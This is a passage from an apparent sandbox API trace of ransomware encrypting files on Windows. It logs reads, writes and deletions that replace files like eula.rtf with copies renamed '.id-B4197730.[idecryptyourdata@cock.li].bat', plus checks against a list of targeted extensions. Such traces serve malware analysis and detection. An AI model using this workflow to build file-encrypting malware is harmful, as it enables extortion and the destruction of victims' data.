lpOverlapped=0x0) returned 1 [0046.703] ReadFile (in: hFile=0x2e0, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0046.703] WriteFile (in: hFile=0x2c0, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xe4, lpOverlapped=0x0) returned 1 [0046.704] SetEndOfFile (hFile=0x2c0) returned 1 [0046.704] CloseHandle (hObject=0x2c0) returned 1 [0046.704] SetFilePointerEx (in: hFile=0x2e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0046.704] SetEndOfFile (hFile=0x2e0) returned 1 [0046.705] CloseHandle (hObject=0x2e0) returned 1 [0046.705] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1028\\eula.rtf.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x80) returned 1 [0046.705] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1028\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1028\\eula.rtf")) returned 1 [0046.706] lstrlenW (lpString="C:\\588bce7c90097ed212\\1028\\eula.rtf") returned 35 [0046.706] lstrlenW (lpString="C:\\588bce7c90097ed212\\1028\\eula.rtf") returned 35 [0046.706] lstrlenW (lpString=".doc") returned 4 [0046.706] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0046.706] lstrlenW (lpString=".docx") returned 5 [0046.706] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0046.706] lstrlenW (lpString=".pdf") returned 4 [0046.706] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0046.706] lstrlenW (lpString=".xls") returned 4 [0046.706] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0046.706] lstrlenW (lpString=".xlsx") returned 5 [0046.706] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0046.706] lstrlenW (lpString=".ppt") returned 4 [0046.706] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0046.706] lstrlenW (lpString="C:\\588bce7c90097ed212\\1028\\eula.rtf") returned 35 [0046.706] lstrlenW (lpString=".zip") returned 4 [0046.706] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0046.706] lstrlenW (lpString=".rar") returned 4 [0046.706] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0046.706] lstrlenW (lpString=".bz2") returned 4 [0046.706] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0046.706] lstrlenW (lpString=".7z") returned 3 [0046.706] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0046.706] lstrlenW (lpString="C:\\588bce7c90097ed212\\1028\\eula.rtf") returned 35 [0046.706] lstrlenW (lpString=".dbf") returned 4 [0046.706] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0046.706] lstrlenW (lpString="C:\\588bce7c90097ed212\\1028\\eula.rtf") returned 35 [0046.706] lstrlenW (lpString=".1cd") returned 4 [0046.706] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0046.707] lstrlenW (lpString="C:\\588bce7c90097ed212\\1028\\eula.rtf") returned 35 [0046.707] lstrlenW (lpString=".jpg") returned 4 [0046.707] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0046.707] lstrlenW (lpString="C:\\588bce7c90097ed212\\1028\\eula.rtf") returned 35 [0046.707] lstrlenW (lpString="C:\\588bce7c90097ed212\\1028\\eula.rtf") returned 35 [0046.707] lstrlenW (lpString=".doc") returned 4 [0046.707] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0046.707] lstrlenW (lpString=".docx") returned 5 [0046.707] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0046.707] lstrlenW (lpString=".pdf") returned 4 [0046.707] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0046.707] lstrlenW (lpString=".xls") returned 4 [0046.707] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0046.707] lstrlenW (lpString=".xlsx") returned 5 [0046.707] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0046.707] lstrlenW (lpString=".ppt") returned 4 [0046.707] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0046.707] lstrlenW (lpString="C:\\588bce7c90097ed212\\1028\\eula.rtf") returned 35 [0046.707] lstrlenW (lpString=".zip") returned 4 [0046.707] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0046.707] lstrlenW (lpString=".rar") returned 4 [0046.707] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0046.707] lstrlenW (lpString=".bz2") returned 4 [0046.707] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0046.707] lstrlenW (lpString=".7z") returned 3 [0046.707] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0046.707] lstrlenW (lpString="C:\\588bce7c90097ed212\\1028\\eula.rtf") returned 35 [0046.707] lstrlenW (lpString=".dbf") returned 4 [0046.707] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0046.707] lstrlenW (lpString="C:\\588bce7c90097ed212\\1028\\eula.rtf") returned 35 [0046.707] lstrlenW (lpString=".1cd") returned 4 [0046.707] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0046.707] lstrlenW (lpString="C:\\588bce7c90097ed212\\1028\\eula.rtf") returned 35 [0046.707] lstrlenW (lpString=".jpg") returned 4 [0046.708] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0046.708] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0046.708] lstrlenW (lpString="LocalizedData.xml") returned 17 [0046.708] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1028\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1028\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0046.708] GetFileSizeEx (in: hFile=0x2e0, lpFileSize=0x2d0ff14 | out: lpFileSize=0x2d0ff14*=60816) returned 1 [0046.708] CloseHandle (hObject=0x2e0) returned 1 [0046.708] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1028\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1028\\localizeddata.xml")) returned 0x80 [0046.708] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1028\\LocalizedData.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\1028\\localizeddata.xml.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0046.708] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1028\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1028\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0046.708] SetFilePointerEx (in: hFile=0x2e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0046.708] SetFilePointerEx (in: hFile=0x2e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0046.708] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1028\\LocalizedData.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\1028\\localizeddata.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c0 [0046.709] GetLastError () returned 0x0 [0046.709] ReadFile (in: hFile=0x2e0, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0xed90, lpOverlapped=0x0) returned 1 [0046.711] WriteFile (in: hFile=0x2c0, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xeda0, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xeda0, lpOverlapped=0x0) returned 1 [0046.713] ReadFile (in: hFile=0x2e0, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0046.713] WriteFile (in: hFile=0x2c0, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xf6, lpOverlapped=0x0) returned 1 [0046.713] SetEndOfFile (hFile=0x2c0) returned 1 [0046.713] CloseHandle (hObject=0x2c0) returned 1 [0046.715] SetFilePointerEx (in: hFile=0x2e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0046.715] SetEndOfFile (hFile=0x2e0) returned 1 [0046.717] CloseHandle (hObject=0x2e0) returned 1 [0046.717] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1028\\LocalizedData.xml.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x80) returned 1 [0046.717] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1028\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1028\\localizeddata.xml")) returned 1 [0046.718] lstrlenW (lpString="C:\\588bce7c90097ed212\\1028\\LocalizedData.xml") returned 44 [0046.718] lstrlenW (lpString="C:\\588bce7c90097ed212\\1028\\LocalizedData.xml") returned 44 [0046.718] lstrlenW (lpString=".doc") returned 4 [0046.718] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0046.718] lstrlenW (lpString=".docx") returned 5 [0046.718] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0046.718] lstrlenW (lpString=".pdf") returned 4 [0046.718] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0046.718] lstrlenW (lpString=".xls") returned 4 [0046.718] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0046.718] lstrlenW (lpString=".xlsx") returned 5 [0046.718] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0046.718] lstrlenW (lpString=".ppt") returned 4 [0046.718] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0046.718] lstrlenW (lpString="C:\\588bce7c90097ed212\\1028\\LocalizedData.xml") returned 44 [0046.718] lstrlenW (lpString=".zip") returned 4 [0046.718] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0046.718] lstrlenW (lpString=".rar") returned 4 [0046.718] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0046.718] lstrlenW (lpString=".bz2") returned 4 [0046.718] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0046.718] lstrlenW (lpString=".7z") returned 3 [0046.718] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0046.718] lstrlenW (lpString="C:\\588bce7c90097ed212\\1028\\LocalizedData.xml") returned 44 [0046.718] lstrlenW (lpString=".dbf") returned 4 [0046.718] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0046.718] lstrlenW (lpString="C:\\588bce7c90097ed212\\1028\\LocalizedData.xml") returned 44 [0046.719] lstrlenW (lpString=".1cd") returned 4 [0046.719] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0046.719] lstrlenW (lpString="C:\\588bce7c90097ed212\\1028\\LocalizedData.xml") returned 44 [0046.719] lstrlenW (lpString=".jpg") returned 4 [0046.719] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0046.719] lstrlenW (lpString="C:\\588bce7c90097ed212\\1028\\LocalizedData.xml") returned 44 [0046.719] lstrlenW (lpString="C:\\588bce7c90097ed212\\1028\\LocalizedData.xml") returned 44 [0046.719] lstrlenW (lpString=".doc") returned 4 [0046.719] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0046.719] lstrlenW (lpString=".docx") returned 5 [0046.719] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0046.719] lstrlenW (lpString=".pdf") returned 4 [0046.719] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0046.719] lstrlenW (lpString=".xls") returned 4 [0046.719] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0046.719] lstrlenW (lpString=".xlsx") returned 5 [0046.719] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0046.719] lstrlenW (lpString=".ppt") returned 4 [0046.719] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0046.719] lstrlenW (lpString="C:\\588bce7c90097ed212\\1028\\LocalizedData.xml") returned 44 [0046.719] lstrlenW (lpString=".zip") returned 4 [0046.719] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0046.719] lstrlenW (lpString=".rar") returned 4 [0046.719] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0046.719] lstrlenW (lpString=".bz2") returned 4 [0046.719] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0046.719] lstrlenW (lpString=".7z") returned 3 [0046.719] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0046.719] lstrlenW (lpString="C:\\588bce7c90097ed212\\1028\\LocalizedData.xml") returned 44 [0046.719] lstrlenW (lpString=".dbf") returned 4 [0046.719] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0046.719] lstrlenW (lpString="C:\\588bce7c90097ed212\\1028\\LocalizedData.xml") returned 44 [0046.719] lstrlenW (lpString=".1cd") returned 4 [0046.719] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0046.720] lstrlenW (lpString="C:\\588bce7c90097ed212\\1028\\LocalizedData.xml") returned 44 [0046.720] lstrlenW (lpString=".jpg") returned 4 [0046.720] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0046.720] lstrcmpiW (lpString1=".rtf", lpString2=".bat") returned 1 [0046.720] lstrlenW (lpString="eula.rtf") returned 8 [0046.720] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1029\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1029\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0046.780] GetFileSizeEx (in: hFile=0x2e0, lpFileSize=0x2d0ff14 | out: lpFileSize=0x2d0ff14*=3726) returned 1 [0046.780] CloseHandle (hObject=0x2e0) returned 1 [0046.780] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1029\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1029\\eula.rtf")) returned 0x80 [0046.780] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1029\\eula.rtf.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\1029\\eula.rtf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0046.780] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1029\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1029\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0046.780] SetFilePointerEx (in: hFile=0x2e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0046.781] SetFilePointerEx (in: hFile=0x2e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0046.781] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1029\\eula.rtf.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\1029\\eula.rtf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c0 [0046.781] GetLastError () returned 0x0 [0046.781] ReadFile (in: hFile=0x2e0, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0xe8e, lpOverlapped=0x0) returned 1 [0046.782] WriteFile (in: hFile=0x2c0, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xe90, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xe90, lpOverlapped=0x0) returned 1 [0046.783] ReadFile (in: hFile=0x2e0, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0046.783] WriteFile (in: hFile=0x2c0, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xe4, lpOverlapped=0x0) returned 1 [0046.783] SetEndOfFile (hFile=0x2c0) returned 1 [0046.783] CloseHandle (hObject=0x2c0) returned 1 [0046.784] SetFilePointerEx (in: hFile=0x2e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0046.784] SetEndOfFile (hFile=0x2e0) returned 1 [0046.785] CloseHandle (hObject=0x2e0) returned 1 [0046.785] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1029\\eula.rtf.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x80) returned 1 [0046.785] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1029\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1029\\eula.rtf")) returned 1 [0046.785] lstrlenW (lpString="C:\\588bce7c90097ed212\\1029\\eula.rtf") returned 35 [0046.785] lstrlenW (lpString="C:\\588bce7c90097ed212\\1029\\eula.rtf") returned 35 [0046.785] lstrlenW (lpString=".doc") returned 4 [0046.786] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0046.786] lstrlenW (lpString=".docx") returned 5 [0046.786] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0046.786] lstrlenW (lpString=".pdf") returned 4 [0046.786] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0046.786] lstrlenW (lpString=".xls") returned 4 [0046.786] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0046.786] lstrlenW (lpString=".xlsx") returned 5 [0046.786] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0046.786] lstrlenW (lpString=".ppt") returned 4 [0046.786] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0046.786] lstrlenW (lpString="C:\\588bce7c90097ed212\\1029\\eula.rtf") returned 35 [0046.786] lstrlenW (lpString=".zip") returned 4 [0046.786] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0046.786] lstrlenW (lpString=".rar") returned 4 [0046.786] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0046.786] lstrlenW (lpString=".bz2") returned 4 [0046.786] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0046.786] lstrlenW (lpString=".7z") returned 3 [0046.786] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0046.786] lstrlenW (lpString="C:\\588bce7c90097ed212\\1029\\eula.rtf") returned 35 [0046.786] lstrlenW (lpString=".dbf") returned 4 [0046.786] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0046.786] lstrlenW (lpString="C:\\588bce7c90097ed212\\1029\\eula.rtf") returned 35 [0046.786] lstrlenW (lpString=".1cd") returned 4 [0046.786] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0046.786] lstrlenW (lpString="C:\\588bce7c90097ed212\\1029\\eula.rtf") returned 35 [0046.786] lstrlenW (lpString=".jpg") returned 4 [0046.786] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0046.787] lstrlenW (lpString="C:\\588bce7c90097ed212\\1029\\eula.rtf") returned 35 [0046.787] lstrlenW (lpString="C:\\588bce7c90097ed212\\1029\\eula.rtf") returned 35 [0046.787] lstrlenW (lpString=".doc") returned 4 [0046.787] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0046.787] lstrlenW (lpString=".docx") returned 5 [0046.787] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0046.787] lstrlenW (lpString=".pdf") returned 4 [0046.787] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0046.787] lstrlenW (lpString=".xls") returned 4 [0046.787] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0046.787] lstrlenW (lpString=".xlsx") returned 5 [0046.787] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0046.787] lstrlenW (lpString=".ppt") returned 4 [0046.787] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0046.787] lstrlenW (lpString="C:\\588bce7c90097ed212\\1029\\eula.rtf") returned 35 [0046.787] lstrlenW (lpString=".zip") returned 4 [0046.787] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0046.787] lstrlenW (lpString=".rar") returned 4 [0046.787] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0046.787] lstrlenW (lpString=".bz2") returned 4 [0046.787] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0046.787] lstrlenW (lpString=".7z") returned 3 [0046.787] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0046.787] lstrlenW (lpString="C:\\588bce7c90097ed212\\1029\\eula.rtf") returned 35 [0046.787] lstrlenW (lpString=".dbf") returned 4 [0046.787] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0046.787] lstrlenW (lpString="C:\\588bce7c90097ed212\\1029\\eula.rtf") returned 35 [0046.788] lstrlenW (lpString=".1cd") returned 4 [0046.788] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0046.788] lstrlenW (lpString="C:\\588bce7c90097ed212\\1029\\eula.rtf") returned 35 [0046.788] lstrlenW (lpString=".jpg") returned 4 [0046.788] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0046.788] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0046.788] lstrlenW (lpString="LocalizedData.xml") returned 17 [0046.788] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1031\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1031\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0046.788] GetFileSizeEx (in: hFile=0x2e0, lpFileSize=0x2d0ff14 | out: lpFileSize=0x2d0ff14*=82346) returned 1 [0046.788] CloseHandle (hObject=0x2e0) returned 1 [0046.788] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1031\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1031\\localizeddata.xml")) returned 0x80 [0046.788] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1031\\LocalizedData.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\1031\\localizeddata.xml.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0046.788] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1031\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1031\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0046.789] SetFilePointerEx (in: hFile=0x2e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0046.789] SetFilePointerEx (in: hFile=0x2e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0046.789] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1031\\LocalizedData.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\1031\\localizeddata.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c0 [0046.789] GetLastError () returned 0x0 [0046.789] ReadFile (in: hFile=0x2e0, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x141aa, lpOverlapped=0x0) returned 1 [0046.799] WriteFile (in: hFile=0x2c0, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x141b0, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x141b0, lpOverlapped=0x0) returned 1 [0046.802] ReadFile (in: hFile=0x2e0, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0046.802] WriteFile (in: hFile=0x2c0, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xf6, lpOverlapped=0x0) returned 1 [0046.802] SetEndOfFile (hFile=0x2c0) returned 1 [0046.802] CloseHandle (hObject=0x2c0) returned 1 [0046.804] SetFilePointerEx (in: hFile=0x2e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0046.804] SetEndOfFile (hFile=0x2e0) returned 1 [0046.806] CloseHandle (hObject=0x2e0) returned 1 [0046.806] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1031\\LocalizedData.xml.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x80) returned 1 [0046.806] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1031\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1031\\localizeddata.xml")) returned 1 [0046.807] lstrlenW (lpString="C:\\588bce7c90097ed212\\1031\\LocalizedData.xml") returned 44 [0046.807] lstrlenW (lpString="C:\\588bce7c90097ed212\\1031\\LocalizedData.xml") returned 44 [0046.807] lstrlenW (lpString=".doc") returned 4 [0046.807] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0046.807] lstrlenW (lpString=".docx") returned 5 [0046.807] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0046.807] lstrlenW (lpString=".pdf") returned 4 [0046.807] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0046.807] lstrlenW (lpString=".xls") returned 4 [0046.807] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0046.807] lstrlenW (lpString=".xlsx") returned 5 [0046.807] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0047.494] lstrlenW (lpString=".ppt") returned 4 [0047.494] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0047.494] lstrlenW (lpString="C:\\588bce7c90097ed212\\1031\\LocalizedData.xml") returned 44 [0047.494] lstrlenW (lpString=".zip") returned 4 [0047.494] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0047.494] lstrlenW (lpString=".rar") returned 4 [0047.494] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0047.494] 